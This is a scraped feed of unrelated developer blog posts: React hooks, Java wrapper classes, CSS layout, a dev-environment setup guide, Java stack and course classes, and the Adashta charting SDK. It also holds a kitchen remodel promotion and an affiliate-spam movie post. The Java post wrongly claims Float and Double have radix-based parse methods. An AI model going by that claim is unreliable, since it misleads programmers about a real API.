return <div>Component did mount</div>;
}
```
In this example, the `useEffect` hook runs the provided function after the initial render, effectively mimicking the `componentDidMount` behavior.
#### Mimicking `componentWillUnmount` with `useEffect`
The `componentWillUnmount` method is invoked immediately before a component is unmounted and destroyed. This is where you clean up subscriptions, timers, or any other resources that need to be released. In functional components, we can replicate this using the cleanup function inside `useEffect`.
```javascript
import { ReactElement, useEffect } from "react";
export function ComponentWillUnmount(): ReactElement {
useEffect(() => {
const myTimer = setInterval(() => {
console.log('Clock tick');
}, 1000);
return () => {
// Cleanup function
clearInterval(myTimer);
console.log('Component unmounted');
};
}, []); // Empty dependency array ensures setup happens once and cleanup on unmount
return <div>Component will unmount</div>;
}
```
In this code, `clearInterval` is called in the cleanup function to stop the timer when the component unmounts, mimicking the `componentWillUnmount` method.
#### Mimicking `componentDidUpdate` with `useEffect`
The `componentDidUpdate` method is called immediately after updating occurs. This method is useful for operating on the DOM when the component has been updated, such as fetching new data based on changed props or state. We can achieve this in functional components by using `useEffect` without an empty dependency array.
```javascript
import { ReactElement, useEffect, useState } from "react";
export function ComponentDidUpdate(): ReactElement {
const [count, setCount] = useState(0);
useEffect(() => {
// Code to run on update
console.log('Component updated');
// Perform any operations that need to happen after updates
});
function addOne(): void {
setCount(count + 1);
}
function subtractOne(): void {
setCount(count - 1);
}
return (
<div>
Component did update | Count: {count}
<button onClick={addOne}>+</button>
<button onClick={subtractOne}>-</button>
</div>
);
}
```
In this example, `useEffect` runs after every render, which includes updates, effectively mimicking the `componentDidUpdate` method.
### Conclusion
React Hooks have revolutionized the way we write functional components, making them just as powerful and flexible as class-based components. By leveraging hooks like `useEffect`, we can easily replicate the lifecycle methods `componentDidMount`, `componentWillUnmount`, and `componentDidUpdate`.
This approach allows developers to maintain clean, concise code while ensuring that all necessary side effects and cleanup tasks are properly handled. Embracing these techniques will not only improve the readability and maintainability of your functional components but also ensure they behave consistently with their class-based counterparts.
By understanding and utilizing hooks effectively, you can harness the full potential of React's functional components and build more efficient, reliable applications. So, go ahead and refactor your class components to functional ones, and experience the modern, hook-based approach to lifecycle management in React. Happy coding! 🚀
| geraldhamiltonwicks |
1,878,564 | Processing Primitive Data Type Values as Objects | A primitive type value is not an object, but it can be wrapped in an object using a wrapper class in... | 0 | 2024-06-05T22:28:59 | https://dev.to/paulike/processing-primitive-data-type-values-as-objects-10o4 | java, programming, learning, beginners | A primitive type value is not an object, but it can be wrapped in an object using a wrapper class in the Java API. Owing to performance considerations, primitive data type values are not objects in Java.
Because of the overhead of processing objects, the language’s performance would be adversely affected if primitive data type values were treated as objects. However, many Java methods require the use of objects as arguments. Java offers a convenient way to incorporate, or wrap, a primitive data type into an object (e.g., wrapping **int** into the **Integer** class, wrapping **double** into the **Double** class, and wrapping **char** into the **Character** class,). By using a wrapper class, you can process primitive data type values as objects. Java provides **Boolean**, **Character**, **Double**, **Float**, **Byte**, **Short**, **Integer**, and **Long** wrapper classes in the **java.lang** package for primitive data types. The **Boolean** class wraps a Boolean value **true** or **false**. This section uses **Integer** and **Double** as examples to introduce the numeric wrapper classes. Most wrapper class names for a primitive type are the same as the primitive data type name with the first letter capitalized. The exceptions are **Integer** and **Character**.
Numeric wrapper classes are very similar to each other. Each contains the methods **doubleValue()**, **floatValue()**, **intValue()**, **longValue()**, **shortValue()**, and **byteValue()**. These methods “convert” objects into primitive type values. The key features of **Integer** and **Double** are shown in Figure below.

You can construct a wrapper object either from a primitive data type value or from a string representing the numeric value—for example, **new Double(5.0)**, **new Double("5.0")**, **new Integer(5)**, and **new Integer("5")**.
The wrapper classes do not have no-arg constructors. The instances of all wrapper classes are immutable; this means that, once the objects are created, their internal values cannot be changed.
Each numeric wrapper class has the constants **MAX_VALUE** and **MIN_VALUE**. MAX_VALUE represents the maximum value of the corresponding primitive data type. For **Byte**, **Short**, **Integer**, and **Long**, **MIN_VALUE** represents the minimum **byte**, **short**, **int**, and **long** values. For **Float** and **Double**, **MIN_VALUE** represents the _minimum positive_ **float** and **double** values. The following statements display the maximum integer (2,147,483,647), the minimum positive float (1.4E–45), and the maximum double floating-point number (1.79769313486231570e + 308d).
```java
System.out.println("The maximum integer is " + Integer.MAX_VALUE);
System.out.println("The minimum positive float is " +
    Float.MIN_VALUE);
System.out.println(
    "The maximum double-precision floating-point number is " +
    Double.MAX_VALUE);
```
Each numeric wrapper class contains the methods **doubleValue()**, **floatValue()**, **intValue()**, **longValue()**, and **shortValue()** for returning a **double**, **float**, **int**, **long**, or **short** value for the wrapper object. For example,
```java
new Double(12.4).intValue() // returns 12
new Integer(12).doubleValue() // returns 12.0
```
Recall that the **String** class contains the **compareTo** method for comparing two strings. The numeric wrapper classes contain the **compareTo** method for comparing two numbers; it returns **1**, **0**, or **-1** if this number is greater than, equal to, or less than the other number. For example,
**new Double(12.4).compareTo(new Double(12.3))** returns **1**;
**new Double(12.3).compareTo(new Double(12.3))** returns **0**;
**new Double(12.3).compareTo(new Double(12.51))** returns **-1**;
The numeric wrapper classes have a useful static method, **valueOf (String s)**. This method creates a new object initialized to the value represented by the specified string. For example,
```java
Double doubleObject = Double.valueOf("12.4");
Integer integerObject = Integer.valueOf("12");
```
You have used the **parseInt** method in the **Integer** class to parse a numeric string into an **int** value and the **parseDouble** method in the **Double** class to parse a numeric string into a **double** value. Each numeric wrapper class has two overloaded parsing methods to parse a numeric string into an appropriate numeric value based on **10** (decimal) or any specified radix (e.g., **2** for binary, **8** for octal, and **16** for hexadecimal).
```java
// These two methods are in the Byte class
public static byte parseByte(String s)
public static byte parseByte(String s, int radix)
// These two methods are in the Short class
public static short parseShort(String s)
public static short parseShort(String s, int radix)
// These two methods are in the Integer class
public static int parseInt(String s)
public static int parseInt(String s, int radix)
// These two methods are in the Long class
public static long parseLong(String s)
public static long parseLong(String s, int radix)
// These two methods are in the Float class
public static float parseFloat(String s)
public static float parseFloat(String s, int radix)
// These two methods are in the Double class
public static double parseDouble(String s)
public static double parseDouble(String s, int radix)
```
For example,
**Integer.parseInt("11", 2)** returns **3**;
**Integer.parseInt("12", 8)** returns **10**;
**Integer.parseInt("13", 10)** returns **13**;
**Integer.parseInt("1A", 16)** returns **26**;
**Integer.parseInt("12", 2)** would raise a runtime exception because **12** is not a binary number.
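The parsing results above can be checked with a short program (the class name `RadixDemo` is ours, not from the text):

```java
public class RadixDemo {
    public static void main(String[] args) {
        System.out.println(Integer.parseInt("11", 2));  // prints 3
        System.out.println(Integer.parseInt("12", 8));  // prints 10
        System.out.println(Integer.parseInt("13", 10)); // prints 13
        System.out.println(Integer.parseInt("1A", 16)); // prints 26
        try {
            Integer.parseInt("12", 2); // '2' is not a valid binary digit
        } catch (NumberFormatException e) {
            System.out.println("12 is not a binary number");
        }
    }
}
```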
Note that you can convert a decimal number into a hex number using the **format** method. For example,
**String.format("%X", 26)** returns **1A**; | paulike |
1,875,234 | CSS Grid vs. Flexbox: Unleashing the Secrets to a Truly Responsive Website | Introduction In the world of web design, arranging elements on a page is both an art and a... | 0 | 2024-06-05T22:27:31 | https://dev.to/wafa_bergaoui/css-grid-vs-flexbox-unleashing-the-secrets-to-a-truly-responsive-website-4665 | css, frontend, webdev, development | ## **Introduction**
In the world of web design, arranging elements on a page is both an art and a science. Two of the most powerful tools available for creating responsive layouts are **CSS Grid** and **Flexbox**. While both are incredibly useful, they serve different purposes and excel in different scenarios. In this article, we’ll dive deep into the differences between CSS Grid and Flexbox, with clear, detailed explanations and code examples to help you understand when and why to use each.
## **What is CSS Grid?**
CSS Grid is a two-dimensional layout system designed to handle both columns and rows. It provides a grid-based layout that allows web developers to create complex and responsive designs with ease.
**Key Features of CSS Grid:**
1. Two-dimensional control: Manage both rows and columns.
2. Explicit and implicit grids: Define fixed and dynamic layouts.
3. Powerful alignment capabilities: Align items both within the grid and within individual cells.
**Example of CSS Grid:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
.grid-container {
display: grid;
grid-template-columns: 1fr 1fr 1fr;
grid-gap: 10px;
}
.grid-item {
background-color: #4CAF50;
padding: 20px;
text-align: center;
color: white;
}
</style>
</head>
<body>
<div class="grid-container">
<div class="grid-item">1</div>
<div class="grid-item">2</div>
<div class="grid-item">3</div>
<div class="grid-item">4</div>
<div class="grid-item">5</div>
<div class="grid-item">6</div>
</div>
</body>
</html>
```
**When to Use CSS Grid:**
- When you need a complex layout with both rows and columns.
- When your layout needs to be responsive and adapt to different screen sizes.
- When aligning items both vertically and horizontally is crucial.
## **What is Flexbox?**
Flexbox, or the Flexible Box Layout, is a one-dimensional layout model focused on distributing space along a single axis—either horizontal or vertical. It’s designed to help with alignment, spacing, and distribution of items in a container.
**Key Features of Flexbox:**
1. One-dimensional control: Manage items in a row or a column.
2. Simple alignment and distribution: Easily align items along the main and cross axes.
3. Responsive design support: Adjust item sizes and order to fit the container.
**Example of Flexbox:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
.flex-container {
display: flex;
justify-content: space-between;
align-items: center;
background-color: #4CAF50;
}
.flex-item {
background-color: #f1f1f1;
padding: 20px;
margin: 5px;
text-align: center;
color: black;
}
</style>
</head>
<body>
<div class="flex-container">
<div class="flex-item">1</div>
<div class="flex-item">2</div>
<div class="flex-item">3</div>
</div>
</body>
</html>
```
**When to Use Flexbox:**
- When you need a simple layout along a single axis.
- When you need to distribute space and align items within a container.
- When creating flexible and responsive design elements like navigation bars or media objects.
## **CSS Grid vs. Flexbox: Key Differences**
- **Dimension Control:**
  - <u>CSS Grid</u>: Two-dimensional, handling both rows and columns.
  - <u>Flexbox</u>: One-dimensional, handling either a row or a column.
- **Use Cases:**
  - <u>CSS Grid</u>: Best for complex layouts that require precise control over both axes.
  - <u>Flexbox</u>: Ideal for simpler, one-directional layouts and components within a page.
- **Complexity:**
  - <u>CSS Grid</u>: More complex but powerful, suitable for large-scale layouts.
  - <u>Flexbox</u>: Simpler, easier to learn, and perfect for smaller components.
- **Alignment and Spacing:**
  - <u>CSS Grid</u>: Offers detailed control over both horizontal and vertical alignment.
  - <u>Flexbox</u>: Provides excellent control over item alignment along a single axis.
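Condensing the two examples above into just their layout rules makes the contrast concrete: under Grid, items 4–6 wrap into a second row because both axes are controlled, while under Flexbox the items flow along a single main axis.

```css
/* Grid: both rows AND columns are controlled (two-dimensional). */
.grid-container {
  display: grid;
  grid-template-columns: repeat(3, 1fr); /* three equal columns */
  gap: 10px;                             /* items 4-6 wrap into a second row */
}

/* Flexbox: items flow along one axis; spacing is controlled on that axis. */
.flex-container {
  display: flex;
  justify-content: space-between; /* distribute space along the main axis */
  align-items: center;            /* align on the cross axis */
}
```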
## **Best Resources to Learn CSS Grid and Flexbox**
To master CSS Grid and Flexbox, you can explore the following high-quality resources:
**CSS Grid Resources**
1. [MDN Web Docs - CSS Grid Layout:](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Grid_Layout)
Comprehensive documentation and tutorials provided by Mozilla, perfect for both beginners and advanced developers.
2. [CSS-Tricks - A Complete Guide to Grid:](https://css-tricks.com/snippets/css/complete-guide-grid/)
A thorough guide with examples and practical tips on using CSS Grid, provided by CSS-Tricks.
3. [Learn CSS Grid:](https://learncssgrid.com/)
An interactive tutorial site specifically focused on CSS Grid, offering practical examples and exercises.
**Flexbox Resources**
1. [MDN Web Docs - Flexbox:](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Flexible_Box_Layout/Basic_Concepts_of_Flexbox)
Detailed documentation and tutorials on Flexbox from Mozilla, covering basic concepts to advanced usage.
2. [CSS-Tricks - A Complete Guide to Flexbox:](https://css-tricks.com/snippets/css/a-guide-to-flexbox/)
Another excellent guide from CSS-Tricks, this one focused on Flexbox, offering in-depth explanations and examples.
3. [Flexbox Froggy:](https://flexboxfroggy.com/#fr)
A fun, interactive game that teaches you how to use Flexbox through a series of increasingly challenging levels.
**Comprehensive Learning Platforms**
1. [FreeCodeCamp - Responsive Web Design Certification:](https://www.freecodecamp.org/learn/2022/responsive-web-design/)
A free, interactive learning platform that covers both CSS Grid and Flexbox as part of its responsive web design certification.
2. [Grid by Example:](https://gridbyexample.com/)
A collection of examples and tutorials on CSS Grid Layout created by Rachel Andrew, a leading expert in the field.
## **Conclusion**
Both CSS Grid and Flexbox are essential tools in a web developer’s toolkit. Understanding their differences and respective strengths allows you to choose the right tool for the job, ensuring your layouts are both robust and responsive. By mastering both CSS Grid and Flexbox, you’ll be well-equipped to tackle any web design challenge that comes your way. | wafa_bergaoui |
1,878,562 | Transform Your Home with a Stunning Kitchen Remodel | The kitchen is often referred to as the heart of the home, a place where meals are crafted, memories... | 0 | 2024-06-05T22:26:12 | https://dev.to/remodeling/transform-your-home-with-a-stunning-kitchen-remodel-33mf |
The kitchen is often referred to as the heart of the home, a place where meals are crafted, memories are made, and family and friends gather. A well-executed kitchen remodel can breathe new life into your home, enhancing both functionality and aesthetics. Whether you're looking to modernize your space or create a cozy, rustic retreat, a kitchen remodel offers endless possibilities.
Setting the Stage: Planning Your Dream Kitchen
The first step in a successful kitchen remodel is meticulous planning. Begin by envisioning your ideal kitchen and identifying your primary goals. Are you seeking more storage, better workflow, or a complete design overhaul? Consider your cooking habits, entertaining needs, and family dynamics. This is the time to dream big, gather inspiration, and set a realistic budget.
Engaging a professional designer can be invaluable. They bring expertise in space planning, material selection, and the latest design trends. From sleek, minimalist designs to warm, farmhouse styles, a designer can help translate your vision into a functional blueprint.
The Backbone of Design: Layout and Functionality
A kitchen’s layout is crucial to its functionality. The classic work triangle, which positions the sink, stove, and refrigerator in a triangular formation, remains a popular guideline. However, modern kitchens often incorporate work zones tailored to specific tasks like prep, cooking, and cleanup.
Open-concept layouts continue to dominate, offering seamless integration with adjacent living spaces. This design not only enhances sociability but also allows natural light to flood the kitchen, creating a bright and welcoming atmosphere.
Choosing the Right Materials: Durability Meets Style
Material selection plays a pivotal role in both the aesthetics and longevity of your kitchen. Countertops, cabinetry, and flooring should be chosen for durability and style. Quartz and granite countertops offer resilience and a high-end look, while butcher block adds warmth and charm.
For cabinetry, solid wood provides timeless appeal, but engineered options like MDF (medium-density fiberboard) offer affordability and versatility. Don’t forget about hardware – handles and knobs are small details that can significantly impact the overall design.
Adding the Finishing Touches: Appliances and Lighting
Modern appliances not only improve functionality but also add a sleek, high-tech vibe to your kitchen. Consider energy-efficient models to save on utility bills and reduce your environmental footprint. Built-in appliances, like wall ovens and integrated refrigerators, can streamline the look and maximize space.
Lighting is another critical element. A combination of ambient, task, and accent lighting can create a layered effect, enhancing both practicality and ambiance. Pendant lights over an island or under-cabinet lighting can make a dramatic difference.
The Transformation: Enjoying Your New Space
Once the dust settles and the remodel is complete, you’ll be left with a transformed kitchen that elevates your home’s value and your everyday living experience. Regular maintenance, such as sealing countertops and cleaning appliances, will keep your kitchen looking pristine.
In conclusion, a kitchen remodel is a substantial investment that offers significant rewards. With thoughtful planning, quality materials, and expert execution, you can create a space that reflects your style and meets your needs, turning your kitchen into the true heart of your home.
Read More:
https://castleremodeling.net/
https://castleremodeling.net/kitchen-remodel/
https://maps.app.goo.gl/idpwgUkFFM6fsqgY6 | remodeling | |
1,878,560 | Configuração de ambiente de desenvolvimento | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:25:45 | https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k | webdev, beginners, programming | > Este documento é para uso **público e interno**, tanto para pessoas que desejem trabalhar na Anuntech para já saberem um pouco sobre nosso ambiente, quanto para quem acabou de se juntar a Anuntech configurar seu novo ambiente de trabalho.
## Introduction
In this article we will look at the **global** settings used by every team at Anuntech.
Team-specific configuration:
- [BackEnd](https://dev.to/anuntech/configuracao-de-ambiente-backend-359c)
- [Web](https://dev.to/anuntech/configuracao-de-ambiente-web-1fnp)
## Contents
- OS
  - Ubuntu
- CLIs
  - Git
    - Git Config
- Interfaces
  - VSCode
  - Postman
- Website accounts
  - Google
  - GitHub
    - SSH Keys
  - Slack
  - Linear
## OS
We recommend using [Ubuntu](https://ubuntu.com/download). Although any Debian-based distro will work, every reference in this article assumes Ubuntu.
You can install Ubuntu as your main OS or set up a dual boot. Here is a recommendation on how to do the installation:
[](https://youtu.be/6D6L9Wml1oY?si=t383BQ6LE-inJjNd)
## Interfaces
All the interfaces we use can be found in Ubuntu's "app store":


VSCode is used to write code.

Postman is used to make requests to the API and to test its routes.
## CLIs
For the CLIs, just follow the instructions:
- [Git](https://git-scm.com/download/linux)
After that, just configure Git by following [this tutorial](https://dev.to/henriqueleite42/git-config-5e35).
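As a quick reference, the basic identity setup usually boils down to the commands below (the name and email are placeholders; replace them with your own):

```shell
# Tell Git who you are; every commit will carry this identity.
git config --global user.name "Your Name"
git config --global user.email "you@anuntech.com"

# Optional quality-of-life defaults
git config --global init.defaultBranch main
git config --global pull.rebase true

# Verify what was set
git config --global --list
```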
## Website accounts
Just create accounts on the following sites using your Anuntech email:
- [GitHub](https://github.com). If you already have a personal account, you can use it; just [add your Anuntech email](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-email-preferences/adding-an-email-address-to-your-github-account) to it.
  - It is also important to follow [this tutorial](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent) to create an SSH key and [this other tutorial](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account) to add it to your GitHub account.
- [Slack](https://slack.com). In this case you will receive an invitation by email; just click it and create your account from there. We use Slack for general communication: text messages, video and audio calls, important notifications, etc.
- [Linear](https://linear.app). In this case you will receive an invitation by email; just click it and create your account from there. We use Linear to manage our workflow, our tasks, and our delivery estimates.
| henriqueleite42 |
1,878,554 | Case Study on Object-Oriented Thinking | Case Study: Designing the Course Class This section designs a class for modeling courses.... | 0 | 2024-06-05T22:11:04 | https://dev.to/paulike/case-study-on-object-oriented-thinking-3k3c | java, programming, learning, beginners | ## Case Study: Designing the Course Class
This section designs a class for modeling courses. Suppose you need to process course information. Each course has a name and has students
enrolled. You should be able to add/drop a student to/from the course. You can use a class to model the courses, as shown in Figure below.

A **Course** object can be created using the constructor **Course(String name)** by passing a course name. You can add students to the course using the **addStudent(String student)** method, drop a student from the course using the **dropStudent(String student)** method, and return all the students in the course using the **getStudents()** method. Suppose the **Course** class is available; the program below gives a test class that creates two courses and adds students to them.

The **Course** class is implemented in the program below. It uses an array to store the students in the course. For simplicity, assume that the maximum course enrollment is **100**. The array is created using **new String[100]** in line 5. The **addStudent** method (line 12) adds a student to the array. Whenever a new student is added to the course, **numberOfStudents** is increased (line 14). The **getStudents** method returns the array. The **dropStudent** method (line 29) is left as an exercise.

The array size is fixed to be **100** (line 5), so you cannot have more than 100 students in the course. You can improve the class by automatically increasing the array size.
When you create a **Course** object, an array object is created. A **Course** object contains a reference to the array. For simplicity, you can say that the **Course** object contains the array.
The user can create a **Course** object and manipulate it through the public methods **addStudent**, **dropStudent**, **getNumberOfStudents**, and **getStudents**. However, the user doesn't need to know how these methods are implemented. The **Course** class encapsulates the internal implementation. This example uses an array to store students, but you could use a different data structure to store the students. The program that uses **Course** does not need to change as long as the contract of the public methods remains unchanged.
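Since the **Course** class appears above only as a figure, here is a minimal sketch of one possible implementation matching the described contract (fixed capacity of 100, `addStudent`, `getStudents`, `getNumberOfStudents`), including one way to write the `dropStudent` method that is left as an exercise. The class is declared package-private here only so the sketch can sit in any file alongside a small driver.

```java
// Sketch of the Course class from the figure above (capacity fixed at 100, as in the text).
class Course {
    private String courseName;
    private String[] students = new String[100];
    private int numberOfStudents;

    public Course(String courseName) {
        this.courseName = courseName;
    }

    public void addStudent(String student) {
        students[numberOfStudents] = student;
        numberOfStudents++;
    }

    /** One possible solution to the dropStudent exercise:
     *  find the student, shift the rest left, and shrink the count. */
    public void dropStudent(String student) {
        for (int i = 0; i < numberOfStudents; i++) {
            if (students[i].equals(student)) {
                for (int j = i; j < numberOfStudents - 1; j++) {
                    students[j] = students[j + 1];
                }
                students[--numberOfStudents] = null;
                return;
            }
        }
    }

    public String[] getStudents() {
        return students;
    }

    public int getNumberOfStudents() {
        return numberOfStudents;
    }

    public String getCourseName() {
        return courseName;
    }
}
```

`dropStudent` keeps the array contiguous by shifting later entries left; if order does not matter, an alternative is to move the last student into the freed slot.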
## Case Study: Designing a Class for Stacks
This section designs a class for modeling stacks. Recall that a stack is a data structure that holds data in a last-in, first-out fashion, as shown in Figure below.

Stacks have many applications. For example, the compiler uses a stack to process method invocations. When a method is invoked, its parameters and local variables are pushed into a stack. When a method calls another method, the new method’s parameters and local variables are pushed into the stack. When a method finishes its work and returns to its caller, its associated space is released from the stack.
You can define a class to model stacks. For simplicity, assume the stack holds the **int** values. So name the stack class **StackOfIntegers**. The UML diagram for the class is shown in Figure below.

Suppose that the class is available. The test program below uses the class to create a stack (line 6), store ten integers **0**, **1**, **2**, . . . , and **9** (line 9), and displays them in reverse order (line 12).

How do you implement the **StackOfIntegers** class? The elements in the stack are stored in an array named **elements**. When you create a stack, the array is also created. The no-arg constructor creates an array with the default capacity of **16**. The variable **size** counts the number of elements in the stack, and **size – 1** is the index of the element at the top of the stack, as shown in Figure below. For an empty stack, **size** is **0**.

The **StackOfIntegers** class is implemented in the program below. The methods **empty()**, **peek()**, **pop()**, and **getSize()** are easy to implement. To implement **push(int value)**, assign **value** to **elements[size]** if **size < capacity** (line 26). If the stack is full (i.e., **size >= capacity**), create a new array of twice the current capacity (line 21), copy the contents of the current array to the new array (line 22), and assign the reference of the new array to the current array in the stack (line 23). Now you can add the new value to the array (line 26).
```
package demo;

public class StackOfIntegers {
    private int[] elements;
    private int size;
    public static int DEFAULT_CAPACITY = 16;

    /** Construct a stack with the default capacity 16 */
    public StackOfIntegers() {
        this(DEFAULT_CAPACITY);
    }

    /** Construct a stack with the specified maximum capacity */
    public StackOfIntegers(int capacity) {
        elements = new int[capacity];
    }

    /** Push a new integer to the top of the stack */
    public void push(int value) {
        if (size >= elements.length) {
            int[] temp = new int[elements.length * 2];
            System.arraycopy(elements, 0, temp, 0, elements.length);
            elements = temp;
        }

        elements[size++] = value;
    }

    /** Return and remove the top element from the stack */
    public int pop() {
        return elements[--size];
    }

    /** Return the top element from the stack */
    public int peek() {
        return elements[size - 1];
    }

    /** Test whether the stack is empty */
    public boolean empty() {
        return size == 0;
    }

    /** Return the number of elements in the stack */
    public int getSize() {
        return size;
    }
}
```
| paulike |
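The **TestStackOfIntegers** driver discussed earlier also appears only as a screenshot, so here is a self-contained sketch of it. A condensed copy of the stack class is included (and both classes are kept package-private) so the snippet compiles on its own:

```java
// Condensed copy of StackOfIntegers so this sketch is self-contained.
class StackOfIntegers {
    private int[] elements = new int[16];
    private int size;

    public void push(int value) {
        if (size >= elements.length) {
            int[] temp = new int[elements.length * 2];
            System.arraycopy(elements, 0, temp, 0, elements.length);
            elements = temp;
        }
        elements[size++] = value;
    }

    public int pop() { return elements[--size]; }
    public boolean empty() { return size == 0; }
    public int getSize() { return size; }
}

class TestStackOfIntegers {
    public static void main(String[] args) {
        StackOfIntegers stack = new StackOfIntegers();

        // Store ten integers 0, 1, 2, ..., 9
        for (int i = 0; i < 10; i++) {
            stack.push(i);
        }

        // Display them in reverse order: 9 8 7 6 5 4 3 2 1 0
        while (!stack.empty()) {
            System.out.print(stack.pop() + " ");
        }
    }
}
```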
1,874,984 | Introducing Adashta: Server-Side Real-Time Charting & More | We are thrilled to announce the launch of Adashta, an advanced SDK designed to simplify real-time... | 0 | 2024-06-05T22:10:59 | https://dev.to/adashta/introducing-adashta-server-side-real-time-charting-more-2jb3 | javascript, node, opensource, productivity | We are thrilled to announce the launch of Adashta, an advanced SDK designed to simplify real-time communication for developers. With Adashta, you can focus on your core business logic while we handle the intricacies of real-time data streaming. Our goal is to make it easier than ever to integrate real-time functionalities into your applications.
## Why Adashta?
In the ever-evolving landscape of web development, real-time communication has become a critical component for delivering dynamic and responsive user experiences. Whether you're building a live data dashboard, a collaborative tool, or a real-time notification system, Adashta has you covered.
## Adashta Charts

One of Adashta's standout features is Adashta Charts, **a server-side charting solution** that enables you to create real-time charts with little to no frontend coding. With Adashta Charts, you can:
- Generate various chart types, including line, bar, and pie charts.
- Update charts in real-time with new data from server.
## Getting Started
### Server-Side Installation and Initialization
To get started with Adashta on the server side, follow these simple steps:
1. Install Adashta via npm:
```bash
npm install adashta
```
2. Initialize Adashta:
```javascript
const { Adashta } = require('adashta');
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: '3011'
});
const loadAdashta = async () => {
adashta.on('connection', async (clientId) => {
console.log('Client connected', clientId);
});
adashta.on('disconnection', async (clientId) => {
console.log('Client disconnected', clientId);
});
};
loadAdashta();
```
### Client-Side Integration
1. Include Adashta SDK in Your HTML:
```html
<script type="module">
import { Adashta } from 'https://cdn.skypack.dev/adashta-js';
</script>
```
2. Initialize Adashta in the Client:
```javascript
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: 3011
});
```
No extra configuration is needed on the client side. Adashta will automatically connect to the server and handle real-time communication between the server and client.
### Creating Real-Time Charts
Woohoo! You're all set up with Adashta on the server and client sides. Now, let's see how you can create real-time charts with Adashta Charts.
1. Define Your Chart:
```javascript
const chart = {
chartId: 'dummy-company-stock-chart',
querySelector: '.chart',
chartData: {
type: 'line',
data: {
labels: ['Day 1'],
datasets: [{
label: 'Dummy Company Stock Price',
data: [350],
borderWidth: 2
}]
},
options: {
scales: {
y: {
title: {
display: true,
text: 'Share Price ($)'
}
},
x: {
title: {
display: true,
text: 'Days'
},
ticks: {
autoSkip: true,
maxTicksLimit: 10,
}
}
}
}
}
};
```
2. Send Chart Data to Client:
```javascript
await adashta.charts().produce(clientId, chart);
```
3. Update Chart Data:
```javascript
chart.chartData.data.labels.push(`Day ${days}`);
chart.chartData.data.datasets[0].data.push(getRandomInt(300, 800));
await adashta.charts().produce(clientId, chart);
```
4. Complete Example:
```javascript
const { Adashta } = require('adashta');
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: '3011'
});
const loadAdashta = async () => {
const clientIdInterval = {};
adashta.on('connection', async (clientId) => {
const chart = {
chartId: 'dummy-company-stock-chart',
querySelector: '.chart',
chartData: {
type: 'line',
data: {
labels: ['Day 1'],
datasets: [{
label: 'Dummy Company Stock Price',
data: [350],
borderWidth: 2
}]
},
options: {
scales: {
y: {
title: {
display: true,
text: 'Share Price ($)'
}
},
x: {
title: {
display: true,
text: 'Days'
},
ticks: {
autoSkip: true,
maxTicksLimit: 10,
}
}
}
}
}
};
await adashta.charts().produce(clientId, chart);
let days = 2;
clientIdInterval[clientId] = setInterval(async () => {
chart.chartData.data.labels.push(`Day ${days}`);
chart.chartData.data.datasets[0].data.push(getRandomInt(300, 800));
await adashta.charts().produce(clientId, chart);
days++;
}, 2000);
});
adashta.on('disconnection', async (clientId) => {
clearInterval(clientIdInterval[clientId]);
delete clientIdInterval[clientId];
console.log('Client disconnected', clientId);
});
};
function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
loadAdashta();
```
5. Run Your Adashta Server:
```bash
node index.js
```
6. Open Your HTML File in a Browser: an HTTP server is required to serve the HTML file. You can use `http-server` or any other HTTP server of your choice.
With Adashta, integrating real-time charts into your application has never been easier. You can dynamically update charts with new data, providing users with up-to-the-minute information.
## Join the Adashta Community
Adashta is an open-source project, and we welcome contributions and feedback from the developer community. If you have any questions or suggestions, please feel free to reach out to us at hello@adashta.co. You can also contribute to the project by visiting our [GitHub](https://github.com/adashta/adashta) repository.
We are excited to see how you will use Adashta to create engaging, real-time experiences for your users. Thank you for choosing Adashta, and happy coding!
Feel free to share your thoughts and experiences with Adashta in the comments below. We're eager to hear how Adashta is making a difference in your projects! | kalpitrathore |
1,878,552 | Knox Goes Away | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge... | 0 | 2024-06-05T22:07:44 | https://dev.to/klodia_12/knox-goes-away-1c08 | javascript, webdev, tutorial, ai | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former member
Knox Goes Away
After a hit man (Michael Keaton) is diagnosed with dementia, he must race against the police to save his estranged son, and outrun the ticking clock of his own deteriorating mind.
208 | IMDb 6.9 | 1 h 54 min | 2024
X-Ray | UHD | R
Welcome to my Pinterest! Explore a world of creativity, inspiration, and unique ideas. From home decor and fashion to DIY projects and delicious recipes, find endless pins to spark your imagination and bring your passions to life. Follow me for daily inspiration and let's create something beautiful together!
Tags: #HomeDecor #FashionInspiration #DIYProjects #DeliciousRecipes #CreativeIdeas #DailyInspiration #Crafts #InteriorDesign #Style #Foodie #Handmade #Travel #Wellness #Art #Beauty
https://amzn.to/3Kwnqdc
Sign up on JVZoo: create an account on the JVZoo platform. Registration is free and quick.
Choose a product: browse the JVZoo marketplace to find products to promote. Pick products that match your audience and have good ratings and conversion rates.
Get affiliate links: once you have selected a product, request approval from the vendor to obtain your unique affiliate link. This link will track the sales generated by your recommendations.
Promote the products: use your affiliate link to promote the product through various channels such as blogs, social media, YouTube videos, email marketing, and paid advertising. Be sure to provide accurate and appealing information about the product to encourage purchases.
Track and optimize: use JVZoo's analytics tools to track your performance. Analyze which strategies work best and adjust your marketing efforts accordingly.
By following these steps, you can start earning commissions on sales of the products you promote on JVZoo.
